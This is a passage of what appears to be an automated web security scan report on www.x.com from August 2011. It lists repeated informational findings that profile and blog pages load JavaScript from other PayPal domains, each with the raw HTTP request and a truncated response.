"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.227. https://www.x.com/people/billday  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/billday

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/billday HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:35 GMT; Path=/
Vary: User-Agent
JP: D=155484 t=1313157155442148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.228. https://www.x.com/people/blingnation2010  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/blingnation2010

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/blingnation2010 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b; Expires=Sun, 11-Sep-2011 13:51:57 GMT; Path=/
Vary: User-Agent
JP: D=82638 t=1313157117852719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.229. https://www.x.com/people/bryngregory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/bryngregory

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/bryngregory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:49 GMT; Path=/
Vary: User-Agent
JP: D=142323 t=1313157169831259
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.230. https://www.x.com/people/das_licht  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/das_licht

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/das_licht HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133373331333b332c3132393239303b332c39313330313b332c3132323335343b332c3133393730313b332c3134303635343b332c3133373135383b332c3133343430323b332c34383739343b332c31303737303b; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=93807 t=1313157132393620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.231. https://www.x.com/people/dchankhour  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/dchankhour

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/dchankhour HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:44 GMT; Path=/
Vary: User-Agent
JP: D=75356 t=1313157164475506
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.232. https://www.x.com/people/eferreira  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/eferreira

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/eferreira HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133343430323b332c34383739343b332c39313330313b332c3134303635343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=84607 t=1313157130615032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.233. https://www.x.com/people/emailPasswordToken!input.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=41689 t=1313157111149225
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.234. https://www.x.com/people/encore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.235. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=175267 t=1313157108233489
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.236. https://www.x.com/people/gazugafan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gazugafan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/gazugafan HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133363236393b332c3133373331333b332c3132393239303b332c3133393730313b332c3133313833303b332c3133373135383b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=78479 t=1313157133485041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.237. https://www.x.com/people/gem  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gem

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/gem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:53 GMT; Path=/
Vary: User-Agent
JP: D=130479 t=1313157173386719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.238. https://www.x.com/people/gogoeric  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gogoeric

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/gogoeric HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b; Expires=Sun, 11-Sep-2011 13:51:59 GMT; Path=/
Vary: User-Agent
JP: D=166431 t=1313157119718400
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.239. https://www.x.com/people/hotellina  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/hotellina

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/hotellina HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=239357 t=1313157149186681
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.240. https://www.x.com/people/iConcessionStand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/iConcessionStand

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/iConcessionStand HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b; Expires=Sun, 11-Sep-2011 13:52:01 GMT; Path=/
Vary: User-Agent
JP: D=158386 t=1313157121449840
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.241. https://www.x.com/people/joncas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/joncas

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/joncas HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:46 GMT; Path=/
Vary: User-Agent
JP: D=77890 t=1313157166303738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.242. https://www.x.com/people/lwhite2104  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/lwhite2104

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/lwhite2104 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:51 GMT; Path=/
Vary: User-Agent
JP: D=79758 t=1313157171575959
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.243. https://www.x.com/people/mandeheritage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/mandeheritage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/mandeheritage HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133393730313b332c3133343430323b332c3134303635343b332c39313330313b332c3132323335343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=79098 t=1313157131216875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.244. https://www.x.com/people/odeskdev  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/odeskdev

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/odeskdev HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
